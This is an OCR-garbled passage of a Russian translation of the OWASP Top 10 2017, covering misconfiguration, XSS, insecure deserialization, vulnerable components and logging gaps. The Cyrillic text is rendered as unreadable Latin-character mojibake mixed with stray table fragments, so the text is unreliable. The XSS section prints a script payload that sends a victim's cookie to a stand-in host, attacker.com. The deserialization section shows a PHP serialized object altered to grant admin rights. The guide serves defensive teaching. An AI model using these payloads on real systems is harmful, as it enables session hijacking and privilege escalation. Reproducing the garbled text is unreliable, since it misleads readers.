M3BeCTHbie yH3BMM0CTM, n03B0JlHK)LAMe 3J10yMblLUJieHHMXaM CKOMnpOMeTMpOBaTb 
cepBep. Ecjim oaho m3 stmx npMJioxeHMM HBJineTcn KOHCOJibK) aflMMHMCTpaTopa, a 
CTaHflapTHbie yneTHbie 3anncn He MeHHJiMCb, to aTaxyiomiiM MoxeT bomtm b 
npmioxeHMe m nepexBaTMTb xoHTpojib Hafl hmm, Mcnojib3yn CTaHflapTHbiM napojib. 

Cij.eHapMM Ns2 Ha cepBepe He OTXJuoHeH BbiBOA cnMcxa cjDaMJiOB b xaTajiorax, hto 
no3BOJineT 3JioyMbiLUJieHHMxy h3mtm m Bbirpy3MTb cxoMnMJiMpoBaHHbie Java- 
xjiaccbi, nocjie AexoMnMJiHLjMM m o6paTHoro ananma xoTopbix moxho 
npocMOTpeTb MCxoflHbiM xofl. B pe3yjibTaTe aTaxyiOLAMM MoxeT o6HapyxMTb 
yH3BMM0CTM M nOJiyHMTb flOCTyn X npMJlOXeHMK). 

CueHapMM Ns 3 CepBep npM/io>KeHMM HacTpoeH Ha crrnpaBKy noAPo6Hbix coo6uj,eHMM 06 
OLUI/l6KaX, BK/lK)HaB ASHHbie 0 TpaCCMpOBKe CTeKa. 3 tO MO>KeT npMBecTM K pa 3 l 7 iaLUeHMK) 
Ba>KHOM MHcJiop/viaLj.MM, HanpMMep, 0 BepcMM KOMnoHeHTa, coAep^aiAeM M 3 BecTHbie 
YB 3 BMMOCTM. 

CueHapuM N 24 nocTaBLijMK oSjiaHHbix ycjiyr Mcnojib3yeT CTaHflapTHbie 
pa3peujeHMH o6Lijero AOCTyna nepe3 MHTepHeT ajih Apyrnx nojib30BaTejieM 
o6jiaxa. 3 to no3BOJineT nojiyHMTb AOCTyn x KOHC^MfleHUMajibHOM MHC^opMauMM, 
AOCTynHOM B 06 jiaHH 0 M xpaHMJiMLAe. 


CCBUIKM 

OWASP 

• Pvkoboactbo OWASP no TecTi/ipoBaHi/iK): ynpaBJieHMe 

KOHfoHrypaiiHeH 

• Pvkoboactbo OWASP no TecTi/ipoBaHHK): Konbi olijm6ok 

• flpoexT OWASP: 5e3onacHbie 3aroAOBKM 

P,nn noAyHeHMfi AonojiHmeribHOM MHc[)opMai 4 MM no ashhom TeMe 
cm. "CTaHAapT noATBepxAeHkm 6e3onacHOCTn npnnoxeHMM 

(ASVS): VI9 KoHcbnrypaiinn ". 

CTOpOHHPie 

• Pvkoboactbo NIST no noBbimeHHK) 6e3onacHOCTM cepBepoB 

• CWE-2: yn3BMM0CTM, CBn3aHHbie co cpeAQM 

• CWE-16: yn3BMM0CTM, CBfl3aHHbie c KOHcjDMrvpam/ieM 

• CWE-388: yn3BHM0CTn, CBn3aHHbie c o6pa6oTKOM olijm6ok 

• PvKOBOACTBa/cTaHAapTbi CIS no HacTpoMKe 6e3onacHQCTn 

• Q6HapvxeHne m nepeHMcneHMe KOHTeMHeppB Amazon S3 
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ABT0MaTM3Mp0BaHHbie MHCTpyiS/ieHTbl 
MoryT o6HapyxnBaTb m 
3KcnnyaTnpoBaTb Bee ipn BMfla 
MexcaMTOBoro BbinonHeHMn 
cueHapMeB, 6onee Toro, 
cjDpeMMBopKM mx SKcnnyaTaijMM 

MOXHO H3MTM B OTKpbITOM flOCTyne. 


MexcaMTOBoe BbinonHeHMe cueHapMeB (XSS) 
nBnnejcn btopom no pacnpocTpaHem-iocTM 
yn3BMMOCTbio M3 Ton-10 OWASP m obHapyxMBaeTcn 
b AByx Tpemx Bcex npMnoxeHMM. 

ABT0MaTM3Mp0BaHHbie MHCTpyMeHTbl MOryT 
o6HapyxMBaTb XSS aBTOMaTMHecKM, ocobeHHO b 
cjiynae npopa6oTaHHbix TexHonorMM, tbkmx kbk 


PHP, J2EE / JSP m ASP.NET. 


MexcaMTOBoe BbinojiHeHMe cueHapneB 6yflei 
HMeTb nocjieflCTBUB cpeflHew cieneHn TBxedn 
b cjiynae oipaxeHHoro XSS mjim XSS Ha ocHOBe 
o6-beKTHOH MOfle/iH flOKyMeHTa m cepbe3Hbie 
nocjieflCTBHH b cjiynae MexcaMTOBoro 
BbinoriHeHHH xpaHHMbix cueHapMeB c 
yflajieHHbiM BbinojiHeHMeM KOfla b 6pay3epe 
nojib30BaiejiH, HanpMMep, xpaxa yneTHbix 
AaHHbix, nepexBaT ceccMM mjim yciaHOBKa 
BpeflOHOCHoro flO. 


HBJiaeTCH jim npMJioxeHMe ymsbmmbim? 

CymecTByeT jpv\ Tuna XSS, o6bNHO SKcmiyaTMpyeMbix b 6pay3epax: 

OipaxeHHoe MexcaPrroBoe BbinojiHeHMe cueHapMeB (Reflected XSS): 
ripmioxeHMe mjim API BKJnonaeT HenpoBepeHHbie m Henpeo6pa30BaHHbie 
AaHHbie b codaB HTML. YcneniHafl aiaKa MoxeT npMBecTM k BbinormeHUK) 
npoM3BoiibHoro HTML- m Java Seri pt-KOAa b 6pay3epe xepTBbi. 06bNHO 
3JioyMbiLUJieHHMKy Heo6xoAMMoy6eAMTb nojib30BaTejin nepeMTM no 
ccbinKe, BeAyiAeM Ha BpeAOHOCHyio CTpaHMuy, HanpMMep, ncnorib3yn aiaxy 
Tuna "BOAonow" mjim peKiiaMy. 

MexcaMTOBoe BbinojiHeHMe xpaHHMbix cueHapweB (Stored XSS): 
ripmioxeHMe mjim API coxpaHneT Heo6pa6oTaHHbie BXOAHbie AaHHbie, c 
KOTOpbIMM 33TeM B3aMM0A6MCTByi0T n0Jlb30BaTeJlM MJIM aAMMHMCTpaTOpbl. 
MexcaMTOBoe BbinojiHeHMexpaHMMbix cueHapMeB o6bNHo cHMTaeTcn 
oneHb onacHOM yn3BMMOCTbio. 

MexcaMTOBoe BbinojiHeHMe cueHapMeB Ha ocHOBe o6~beKTHOM moastim 
AOK yMeHTa (DOM XSS): JavaScript-cjDpeMMBopKM, oAHOCTpaHMHHbie 
npMJioxeHMH m API, AMHaMMHecKM Ao6aBJinioiAMe BpeAOHOCHbie AaHHbie Ha 
CTpaHMpbi, noABepxeHbi XSS Ha ocHOBe DOM. B MAeajie, npMJioxeHMe He 
AOJixHOOTnpaBJiHTb BpeAOHOCHbie AaHHbie He6e3onacHbiM JavaScript API. 

06bNHo XSS Mcnojib3yeTcn p,nn nepexBaia ceccMM, KpaxM yuen-ibix 
3anMceM, o6xoAa MOA, 3aMeHbi mjim noAMeHbi DOM-y3JiOB (Hanp., 
TpoHHCKMe naHejiM BxoAa b cMCTeMy), a Taxxe aiaK Ha 6pay3epbi, 
HanpMMep, p,nn 3arpy3KM BpeAOHOCHoro 110, perMCTpauMM HaxaTMM m 
ApyrMx aiax Ha CTopoHe KJiMeHTa. 


KaK npeflOTBpaTMTt 

Ann npeAOTBpaiAOHMH XSS HeoSxoAMMO OTAejiHTb HenpoBepeHHbie 

AaHHbie ot aKTMBHoro KOHTeHTa 6pay3epa. Stord moxho AOCTMHb 

cjieAyiOLAMMM cnoco6aMM: 

• Mcnojib30BaTb cjDpeMMBopKM c aBTOMaTMHecKMM npeo6pa30BaHMeM 
AaHHbix, Kax b nocjieAHMX BepcMnx Ruby on Rails m React JS. 
HeobxoAMMO TaKxe npoaHajiM3MpoBaTb orpaHMHeHMH XSS-3aLAMTbi 
KaxAorocfDpeMMBopKa m o6ecneHMTbcooTBeTCTByioLuyKDo6pa6oTKy3TMX 

MCKJlKDHeHMM. 

• l1peo6pa30BbiBaTb HeAOBepeHHbie AaHHbie M3 HTTP-3anpocoB, 
ocHOBbiBancbHa KOHTeKCTe, b HTML-KOAe (Tejie, aipMbyTax, JavaScript, 
CSS mjim URL) ajih npeAOTBpameHMH OTpaxeHHoroXSS m 
MexcaMTOBoro BbinojiHeHMnxpaHMMbixcueHapMeB. "llaMHTKa OWASP: 
npeAOTBpameHMe XSS" coAepxMT noApobHbie MHCTpyKUMM no 
npeo6pa30BaHMio AaHHbix. 

• ripMMeHSTb KOHTeKCTHOe K0AMp0B3HMe npM M3MeHeHMM AOKyMeHTa b 6pay3epe 
nojib30Baiejis ajis npeAOTBpameHMs XSS Ha ocHOBe DOM. Ecjim sto 
HeB03M0XH0, to npMMeHHTb KOHTeKCTHOe KOAMpoBaHMe k API 6pay3epa (cm. 
"flaMHTKv OWASP: flpeziOTBpameHMe XSS Ha ocHOBe DOM" ). 

• l/lcnOJlb3QBaTb nOJIMTMKV 3aLAMTbl COAePXMMOrO (CSP) AJlfl 
npeAOTBpameHMnXSS. 3ia Mepa 3c|Dc|DeKTMBHa, ecjiM oTcyTCTByioT 
yn3BMMOCTM, no3BOJinioLAMe BHeAPMTb koa nepe3 JioKajibHbie cfDaMJibi 
(Hanp., Mcnojib3yn noAMeHy nyjev\ mjim yn3BMMbie 6 m6jimot6km m 3 
pa3pemeHHbix ceieM AOCTaBKM KOHTeHTa). 


IIpHMepM ci^eHapneB aTaK 

CueHapuM NQ1: npmioxeHMe ncnonb3yeT HenpoBepeHHbie 
AaHHbie npn co3AaHMM HTML-CHHnneia 6e3 mx noATBepxAeHMH 
Mnn npeo6pa30BaHMn: 

(String) page += "<input name= , creditcard' type=TEXT' 
value-" + request.getParameterC'CC") + 

3noyMbiujneHHMK MeHneT napaMeip 'CC' b 6pay3epe Ha: 

, ><script>document.location= 

'http://www.attacker.com/cgi-bin/cookie.cgi? 

foo= , +document.cookie</script>'. 

1/lAeHTMcfDMKaTop ceccMM xepTBbi OTnpaBnneTcn Ha cam 
3noyMbiujneHHMKa, no3Bonnn aiaxyiOLAeMy nepexBaTMTb 
TeKymyio ceccMio nonb30Baienn. 

llpMMeHaHMe: 3noyMbiujneHHMK MoxeT Mcnonb30BaTb XSS p,nn 
obxoAa 3aiAMTbi ot MexcaMTOBOM noAMeHbi 3anpocoB (CSRF), 
Mcnonb3yeMOM b npMnoxeHMM. 


CCLUIKM 

OWASP 

• ripoaKTMBHafl3amMTa OWASP: KoAMpoBaHMe AaHHbix 

• ripoaKTHBHafl3amMTa OWASP: flpoBepKa AaHHbix 

• OraHAapT noATBepxaeHMn 6e3onacHOCTM npMJioxeHMM OWASP: V5 

• Pvkoboactbo OWASP no TecTMpoBaHMio: OTpaxeHHoe MexcaMTOBoe 

BbinojiHeHMe cueHapMeB 

• Pvkoboactbo OWASP no TecTMpoBaHMio: MexcaMTOBoe BbinojiHeHMe 

xpaHMMbix cueHapMeB 

• Pvkoboactbo OWASP no TecTMpoBaHMio: XSS Ha ocHOBe o6~beKTHOM 

MOAeJIM AOKVMeHTa 

• llaMflTKa OWASP: flpeAOTBpauieHMe XSS 

• flaMflTKa OWASP: flpeAOTBpauieHMe XSS Ha ocHOBe DOM 

• flaMJiTKa OWASP: 06xoa c|3MJibTpa XSS 

• flpoeKT KOAMpoBLUMKa Java ot OWASP 

CTopoHHne 

• CWE-79: HeKODpeKTHan HeMTDajiM3auMH BxoziHbix ziaHHbix ot nojib3QBaTejieM 

• PortSwigger: BHezipeHMe b nojib3QBaTejibCKMe LuabjiOHbi 



























































Q 3 


A8 

: 2017 


SaBWCHTOT 

CllOXHOCTb 

PacnpocTpaHeHHOCTb: 

CjlOXHOCTb 

TexHMHeCKHe- 3 1 


npki/ioj+LeHMfl 

3Kcnjiyaiai4MM: 1 

2 

o6HapyxeHkm: 2 


&M3HE M ? 


* 


BekTopbi 

•aT.ak 




HeflociaiKiM 

aejan-acHacTH 


-=l 


SKcnnyaTMpoBaTb flecepnajiM3aunK) cjioxho, 
nocKonbKy roTOBbie 3KcnjioMTbi peflKo 
MOXHO MCn0Jlb30BaTb 6e3 MX M3MeHeHM5q 
MJ1M AOpaSOTKM. 


AaHHafl y^3BMM0CTb BKJiK)HeHa b Ton-10 no pe3ynbTaTaM 

OTpacneBbix MccneAOBaHMM , a He no KOJiMnecTBeHHbiM 
noKa3aTermM. 


riocjieACTBMn olum6ok AecepManM3auMM 
Henb3fl HeAooueHMBaTb. rioAobHbie oi±im6km 
M oryT npMBecTM k yAaneHHOMy BbinonHeHMK) 


HexoTopbie MHCTpyMeHTbi MoryT oOHapyxMBaTb oldm6km 
A ecepManM3auMM, ho A-rm mx noATBepxAeHMH oObiHHO 
TpeOyeTcn ynacTMe cneuMa/iMCTa. OxMAaeTcn, hto no Mepe 
pa3pa60TKM HOBbIX MHCTpyMeHTOB oOHapyxeHMfl M yCTpaHeHMH 
ohjm6ok AecepManM3auMM AaHHbix 06 mx pacnpocTpaHeHHocTM 
CTaHeT OonbLue. 


KOAa, oahom M3 caMbixonacHbix 
yfl3BMMOCTeM. 

riocjieACTBMn A-n^ 6M3Heca 3aBMcm ot 
K pMTMHHOCTM 3aLAMTbl npMJlOXeHMfl M 
AaHHbIX. 


HBJiaeTCH jim npMJioxeHMe y h3bhmbim? 

npMJioxeHMH m API yn3BMMbi, eciiM ocymecTBiiHioT AecepMajiM3auMio 
BpeAOHOCHbix mjim MOAHcjDMUMpoBaHHbix oOteKTOB, npeAOCTaBJineMbix 
3J10yMblLUJieHHMK0M. 

3to no3BormeT ocyLAecTBMTb ABa ocHOBHbix TMna aiax: 

• aTaKM, CBH3aHHbie co CTpyKTypoM oOteKTOB m AaHHbix, KorAa 
3JioyMbiLuiieHHMK M3MeHHeT norMKy npMiioxeHMH mjim yAaneHHo 

BbinOJIHHeT npOM3BOJlbHblM KOA npM HailMHMM AOCTynHblX npMJlOXeHMK) 

KiiaccoB, noBeAeHMe KOTopbix MoxeT MeHHTbcn bo Bpeivm mjim nocjie 

AecepMajiM3auMM; 

• aTaKM c noAMeHOM AaHHbix, HanpMMep, CBH3aHHbie c ynpaBneHMeM 
AOCTynoM, KorAa Mcnojib3yiOTCH cyiAecTByioLAMe CTpyKTypbi AaHHbix, ho 

M3MeHneTcn coAepxMMoe. 

CepMajiM3auMH MoxeT Mcnojib30BaTbcn b npMJioxeHMnx A-Tia: 

• yAaJieHHoro m MexnpoueccHoro B3aMMOAeMCTBMH (RPC/IPC); 

• npoBOAHbix npoTOKOJioB, Be6-cjiyx6, OpoKepoB cooOmeHMM; 

• KSLUMpOBaHMH MJIM COXpaHeHMH ASHHblXJ 

• 6a3 AaHHbix, cepBepoB KSLDMpoBaHMH, cpaMJiOBbix cMdeM; 

• KyKM-cpaMJioB HTTP, napaMeTpoB HTML-cpopM, TOKeHOB 
ayieHTMcjDMKauMM API. 

KaK npeflOTBpaTMTL 

EAMHCTBeHHbiM 6e3onacHbiM pemeHMeM 6yAeT OTKJioHeHMe 

cepMajiM30BaHHbix o6-beKTOB ot HeAOBepeHHbix mctohhmkob mjim 

Mcnojib30BaHMe cpeAbi cepMajiM3auMM, AonycKaiomeM TOJibKO 

npMMMTMBHbie TMnbl A9HHblX. 

Ecjim 3to HeB03M0XH0, peKOMeHAyoTcn cjieAyKDLAee: 

• ripoBepKa uejiocTHOCTM cepMajiM30BaHHbix obteKTOB, HanpMMep, c 
noMOLAbK) UMcfDpoBbix noArmceM, p,nn npeAOTBpamoHMH co3AaHMn 
BpeAOHOCHbix o6-beKTOB mjim noAMeHbi AaHHbix. 

• Bboa CTporMX orpaHMHeHMM TMnoB npM AecepMajiM3auMM nepeA 
C03AaHMeM obteKTa, nocKOJibKy oxMAaeMbiM HBJineTcn noAAatOLAMMcn 
onpeAeJieHMio Habop KJiaccoB. CymecTByioT MeTOAbi obxoAa noAobHOM 
3aiAMTbi, nosTOMy nojiaraTbcn MCKJiioHMTejibHo Ha Hee He 
peKOMeHAyeTcn. 

• I/I 30 JIH 14 MH m 3anycK KOAa, ocyLAecTBJinioLAero AecepMajiM3auMio, b 
epeAe C MMHMMaJlbHblMM npMBMJierMHMM, eCJIM 3TO B03M0XH0. 

• XypHajiMpoBaHMe MCKJnoneHMM m olumSok AecepMajiM3auMM, HanpMMep, 
HenpeAycMOTpeHHbixTMnoB BXOAHbix AaHHbix mjim MCKJiioHeHMM npM 
AecepManM3auMM. 

• OrpaHMHeHMe mjim KOHTpojib bxoahlahxm mcxoa^lamx ceTeBbix 
nOAKJlKDHeHMM KOHTeMHepOB MJIM CepBepOB, OCyLAeCTBJIHIOLAMX 
AecepManM3auMio. 

• OTCJiexMBaHMe AecepMajiM3auMM c npeAynpexAeHMeM o cfraKTax 
npoAOJixMTejibHOM AecepMajiM3auMM. 

IlppiMepLi cu;eHappieB a<raK 

CueHapMMNsl. React-npMJioxeHMe Bbi3biBaeT Ha6op MMKpocjiyxb 

Spring Boot. ByAynM cjDyHKAMOHajibHbiMM nporpaMMMCTaMM, 
pa3pa6oTHMKM nonbuajiMCb obecneHMTb HeM3MeHneMOCTbCBoero KOAa. 
l/lcnojib3yeMoe mmm peweHMe 3aKJiK)HaeTcn b cepMajiM3auMM coctohhmh 
nojib30BaTejin m nepeAane ero c KaxAbiM 3anpocoM. 3jioyMbiujjieHHMK, 
3aMeTMBLUMM noAnMCb Java-o6-beKTa "rOO", MoxeT Mcnojib30BaTb Java 
Serial Killer p,nn yAaJieHHoro BbinojiHeHMH KOAa Ha cepBepe 
npMJioxeHMH. 

CueHapMMN?2. Ha PHP-cjDopyMe Mcnojib3yeTcn cepMajiM3auMH PHP- 
o6-beKTOB p,nn xpaHeHMH "cynepKyKM", coAepxamMX MAeHTMcjDMKaTop, 
pojib, xeuj napojin m APyrne AaHHbie nojib30BaTejin: 

a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user"; 

i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";} 

3jioyMbiujjieHHMK M3MeHneT cepMajiM30BaHHbiM obteKT, HaAejinn ce6n 
npMBMJierMHMM aAMMHMCTpaTopa: 

a:4:{i:0;i:1 ;i:1 ;s:5: ,, Alice ,, ;i:2;s:5: ,, admin M ; 
i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";} 

CCBUIKM 

OWASP 

• llaivmTKa OWASP: £LeceDnajiM3aunjq 

• ripoaKTMBHafl 3aiii.MTa OWASP: 06^3aTejibHaa npoBepKa Bcex 

BXOflHbIX naHHblX 

• CTaHnaoT nonTBeDxneHMjq 6e3onacHOCTM noMnoxem/iM 

OWASP 

• OWASP AoDSecEU 2016: Kax neoexMTb anoKannncnc 

flecepnanM3auMM Java 

• OWASP ADDSecUSA2017: IlfiTHi/ma, 13-e - HxencoH non 

vnapoM 

CTOpOHHMe 

• CWE-502: flecepnanM3auMn HenoBepeHHbix nam-ibix 

• Ee3onacHOCTb fleceDnajiM3aunM Java 

• OWASP AppSec Cali 2015: KoHcepBMPveM oStexTbi 
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McnoJi£> 3 ob aHwe KOMnoHeHTOB 15 

C W 3 BGCTHBIMH y?I 3 BHMOCTHMM 


IrtCTOIMMiM 

yppoa 



B'EkTOpbl 

3T3K 




HEflacraiKM 

aejaucrtacTH 



SaBMCklTOT CllOXHOCTb 

npuyioniEHMfl 3KcnjiyaTauMM: 

HecMOTpn Ha npocTOTy noMcxa yxe 
TOTOBblX SKCnilOMTOB flJlfl SOJlbUJMHCTBa 
M3BeCTHblXyH3BHMOCTeM, HeKOTOpbie M3 
hmx TpeSytOT co3flaHMH cneuMaiibHbix 
cpeflCTB fliifl MXSKcnnyaTauMM. 


S PacnpocTpaHeHHocTb: 

3 


CjlOXHOCTb 

o6HapyxeHkm:2 


TexHMHecKne:2 


A™ 

&M3HEC3 ? 


flaHHan yn3BMM0CTb ABJineTcn oneHb pacnpocTpaHeHHOM. 
LLIa6jiOHbifljiH pa3pa6oTHMKOB, coAepxamne 6ojibi±ioe 
KOJIMHeCTBO KOMnOHeHTOB, MoryT npMBecTM K HenOHMMaHMtO 
Toro, KaKMe KOMnoHeHTbi peaiibHo Mcnojib3yioTcn b 
npMJioxeHMM MJ1M API. 


HeCMOTpfl Ha TO, HTO He Bee yM3BMMOCTM 
npMBOflHT K Cepbe3HblM nOCJieflCTBMHM, 
npMHMHOM HeKOTOpbIX MaCLUTa6HblX 
B3J10M0B CTailM MMeHHO KOMIIOHeHTbl, 
coflepxamne M3BecTHbieyn3BMMOCTM. B 


HexoTopbie cxaHepbi, TaxMe xax retire.js, MoryT noMOHb c 
oSHapyxeHMeM yn3BMM0CTeM, ho onpeAeneHMecnoxHocTM mx 
SKcnnyaTauMM noTpeSyeT AonojiHMTejibHbix ycMJiMM. 


3aBMCMMOCTM OT 3aLAHIAaeMblX 3XTMBOB 
noAo6Hanyrpo3a MoxeT oxa3aTbcn Ha 
BepniMHe Baiuero cnMcxa. 


flBJisieTCH jim npMJioxeHMe ymsbmmbim? 

ripMJioxeHMe yB3BMM0, ecriM: 

• Bbi He 3HaeTe BepcMM Bcex Mcnonb3yeMbix (Ha CTopoHe K/iMeHTa m Ha 
CTopoHe cepBepa) KOMnoHeHTOB. CfOAa othocmtcm caMM KOMnoHeHTbi m 
BCT poeHHbie 33BMCMM0CTM; 

• no coAepxMTya3BMMOCTM, He noAAepxMBaeTCB mjim ycTapeno. Cjoas 
othocmtcm OC, Be6-cepBepbi, cepBepbi npMJioxeHMM, CYEfl, npMJioxeHMM, 
API, a Taxxe Bee KOMnoHeHTbi, cpeAbi McnojiHeHMM m 6m6jimot6xm; 

• noMCK ya3BMM0CTeM Bbino/iHBeTCB HeperynapHO, a Taxxe OTcyTCTByeT 
noAnMCxa Ha SxxnjieTeHM no 6e3onacHOCTM Mcnonb3yeMbix KOMnoHeHTOB; 

• cBoeBpeMeHHO He ycTaHaBJiMBaxrrcM McnpaBJieHMM mjim o6hobji6hmm atim 
MC nOJlb3yeMblX n/iaTCpOpM, CjDpeMMBOpXOB M 3aBMCMMOCTeM. 06blHHO Taxoe 
npoMcxoAMT, KorAa Ha/iMHMe o6hobji6hmm npoBepMeTCM pa3 b MecMij mjim 
KB apTaji, b pe3yjibTaTe Hero opraHM3auMM HeAeJiMMM mjim MecMLjaMM He 
ycTpaHBK)TMcnpaBJieHHbieyn3BMMOCTM; 

• pa3pa60THMKM no He TeCTMpytOT COBMeCTMMOCTb 06 H 0 BJieHHblX MJIM 
McnpaBJieHHbix 6m6jimot6k; 

• He oSecneHMBaeTcn 6e3onacHOCTb KOMnoHeHTOB (cm. A6:2017- 
HeKoppeKTHbie napaMeTpbi 6e3onacHocTM ). 


npHMepu ci^eHapneB stsk 

CueHapuM IStel: KOMnoHeHTbi o6bNHO 3anycxaK)TCfl c npnBMJiemnMn 
npMJioxeHMM, noaTOMy yM3BMM0CTb B J1K)6 oM M3 KOMnoHeHTOB 
MOXeT npMBecTM K Cepbe3HblM nOCJieACTBMMM. Yfl3BMM0CTb MOXeT 
noMBMTbcn cjiynaMHO (HanpMMep, M3-3a olum 6 km b KOfle) mjim 
npeflHaMepeHHO (HanpMMep, 63 kaop). Bot HecKOJibKO npMMepoB 
3KcnjiyaTauMMyM3BMM0CTeM, o6HapyxeHHbix b KOMnoHeHTax: 

• CVE-201 7-5638 : yn3BMM0CTb b Struts 2, no3BOJintoman YAaJieHHO 
BbinOJIHMTb np0M3B0JlbHblM KOA Ha CepBepe, CTaJia npMHMHOM 
HeCK0JlbKMXCepbe3HblX B3J10M0B; 

• yn3 BMMOCTM b MHTepHeTe BemeH (loT) 3anacTyto cjioxho mjim 
H eB03M0XH0 yCTpaHMTb, a 3TO MOXeT npMBecTM K Cepbe3HblM 
nocjieACTBMMM (HanpMMep, b cjiynae 6MOMeAMUMHCXMX npM6opoB). 

CymeCTBytOT aBT0MaTM3Mp0BaHHbie MHCTpyMeHTbl, n03B0JlMK)LAHe 
3J10yMblLUJieHHMKaM HaXOAHTb yM3BMMbie MJIM HeKOppeKTHO 
HacTpoeHHbie CMCTeMbi. HanpMMep, noMCKOBMKShodan p,nn loT 
no3BOJineT o6HapyxMTb vcTpoMCTBa , b KOTopbixAO cmx nop He 
ycTpaHeHa yn3BMM0CTb Heartbleed , KOTopan 6bma McnpaBJieHa b 
anpe/ie2014 roAa. 


KaK npeflOTBpaTMTL 

HeoSxoAMMo peajiM30BaTb npoueccynpaBJieHMM obHOBJieHMMMM: 

• yAaJiMTe HeMcnojib3yeMbie33 bmcmmoctm, a Taxxe jiMLUHMe cfcyHxuMM, 
xoMnoHeHTbi, cfjaMJibi m cBeAeHMM M3 AoxyMeHTauMM; 

• peryjinpHO npoBepMMTe axTyajibHOCTb BepcMM xjimchtcxmx m cepBepHbix 
xoMnoHeHTOB (HanpMMep, cfjpeMMBopxoB m 6M6jiMOTex), a Taxxe mx 
3aBMCMMOCTeM, MCnOJlb3yM TaXMe MHCTpyMeHTbl xax 

versions , DependencvCheck , retire.js m t. n. CjieAMTe 3a hoboctmmm 06 
yn3BMM0CTMx Ha cooTBeTCTByx)LAMx pecypcax, TaxMx xax CVE m NVD . 
l/lcnojib3yMTe MHCTpyMeHTbl ananv\3a cocTaBa no a jim aBTOMaTM3auMM 
npouecca. rioAnMLUMTecb Ha paccbmxM 06 yM3BMM0CTMx, othocmlamxcm x 
Mcnojib3yeMbiM BaMM xoMnoHeHTaM; 

• 3arpyxaiiTe xoMnoHeHTbi M3 ocfDMUMajibHbix mctohhmxob no 6e3onacHbiM 
ccbuixaM. OTAaBaMTe npeAnoHTeHMe noAriMcaHHbiM naxeTaM Ann 
CHMxeHMM pMcxa ycTaHOBXM M3MeHeHHoro mjim BpeAOHOCHoro xoMnoHeHTa; 

• CjieAMTe 3a 6M6jiMOTexaMM m xoMnoHeHTaMM, xoTopbie He 
noAA©P>KMBaK)TCM mjim He nojiynaxjT o6HOBJieHMM 6e3onacHOCTM. Ecjim 
o6HOBJieHMe He bo3moxho, nonpo6yMTe Mcnojib30BaTb BMpTyajibHbie naTHM 
AJin oSHapyxeHMM mjim npeAOTBpamaHMM axcnjiyaTauMM M3BecTHbix 
yM3BMMOCTeM. 

KaxAan opraHM3auMM AOJixHa o6ecnenMTb oTCJiexMBaHMe, npMopMTM3auMio 

M npMMeHeHMe oSHOBJieHMM MJIM M3MeHeHMM B XOHCjDMrypaUMM Ha 

npoTMxeHMM Bcero xM3HeHHoro LjMXJia npMJioxeHMM mjim jimhcmxm 

npMJioxeHMM. 


CCBUIKH 

OWASP 

• CTaHAapT noATBepxaeHMM 6e3onacHQCTM npMJioxeHMM OWASP: VI 

ApxMTexTvoa, pa3pa6oTxa m MoaejiMPOBaHMe vrpo3 

• flpoBepxM 3aBMCMM0CTeM OWASP (ajim 6M6jiMOTex Java m .NET) 

• Pvxoboactbo OWASP no TecTMpoBaHMio: YcTaHOBJieHMe 

B33MMOCBM3eM b apxMTexTVpe npMJioxeHMM (OTG-INFQ-010) 

• PexoMeHAaiiMM OWASP no Mcnojib3QBaHMK) BMpTvajibHbix naTHeM 

CTOpOHHPie 

• YHbman peajibHOCTb He6e3onacHbix 6M6nMOTeK 

• flOMCK Vfl3BHM0CTeM (CVE) MITRE 

• HauMOHanbHan 6a3a naHHbix vn3BmviocTeM (NVD) 

• Retire.js ajim o6HapvxeHMM M3BecTHbixvn3BMMbix 6M6jiMOTex JavaScript 

• BtojiJieTeHM no 6e3onacHOCTM 6n6jinoTeK Node 

MHCTpyMeHTbl m 6a3a naHHbix 6tojuieTeHeM no 6e3onacHOCTM 

6n6jinoTeK Ruby 
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HeflocTaTKM «ypHaroipoBaHMsi D 6 

H MOHMTOpMHra 


* 


BEkTOpbl 

aTak 


=0 


HEflacrarKM 

acjaiacrtacTM 


3aBHCHT0T 

npn/io>keHHfl 

CllOXHOCTb 
SKcnjiyaTaumi: 2 

PacnpocTpaHeHHocTb: 

3 

C/lOXHOCTb 
o6HapyxeHna: 1 

TexHMHecKne: 2 

&M3Heca? 

SxcnjiyaTauna HeAOCTaTxoB xypHanupoBaHna m 
MOHMTO pMHra JieXMT B OCHOBe nOHTM Bcex 
KpynHbIX B3J10M0B. 

npM npoBeAeHMM aTax 3JioyMbiLimeHHMKM 
nonaraiOTCH Ha OTCyTCTBMe kohtpojih m 
CB oeBpeMeHHoro pearMpoBaHMH Ha MHLjMAeHTbi. 

AaHHan yn3BMM0CTb BKinoneHa b Ton-10 no pe3ynbTaTaM 

OToacneBbix MccnenoBaHMM. 

Oahmm m 3 cnocoOoB onpeAeiiMTb xanecTBO MOHMTOpMHra HBJineTcn 
aHanM3 xypHanoB nocne npoBeAeHMn TecTa Ha npoHMKHOBeHMe. 

A jib onpeAeneHMH B03MOXHoro ymepOa Bee AeMCTBMH 
TeCTMpOBLAMKOB AOJIXHbl perMCTpMpOBaTbCH COOTBeTCTBylOLIJMM 
o6pa30M. 

BOJlbLUMHCTBO aTax HaHMHaiOTCH C aHailM3a 
yn3BMM0CTeM. Bo3MOXHOCTb npoBeAeHMH 
noAoOHoro aHanM3a noBbimaeT BeponTHOCTb 
yASHHOM 3KCnnyaTaUMM yH3BMM0CTM 
npaxTMHecxM ao 100%. 

B 2016 roAy o6HapyxeHMe cfDaxTa 
nDOHMKHOBeHMH 3aHMMaJ10 B CDe/lHeM 191 ZieHb 
- HaHeceHHbiM 3a 3 to BpeMH ymep6 Mor 6biTb 
OrpOMHbIM. 


HBJiHeTCH jim npMJioaceHMe ymsbmmbim? 

HeflocTaTKM xypHaiiMpoBaHMfl, o 6 HapyxeHkm aTax, MOHMTOpMHra m 

peampoBaHna Ha MHLjMAeHTbi BbmBJiflKrrcfl nocTOHHHo: 

• noflBepraeMbie ayflmy co 6 biTMn, TaxMe KaK yflanHbie m HeyflanHbie 
nonbiTKM Bxofla b cMCTeMy, a Taxxe BaxHbie TpaH3axuMM, He 
perncTpnpyK)TCH; 

• npeAynpexfleHMa m olum6xm He perMCTpMpyx)TCfl mjim perMCTpMpyxrrcfl 
HeKoppeKTHo; 

• xypHaiibi npmioxeHMM m API He npoBepmoTcn Ha npeAMeT 
nOA03pHTeilbHOM aKTMBHOCTM; 

• xypHaiibi xpaHflTca ToribKo iioKanbHo; 

• noporoBbie 3HaneHHfl npeAynpexAeHMM h cxeMbi peampoBaHM^ Ha 
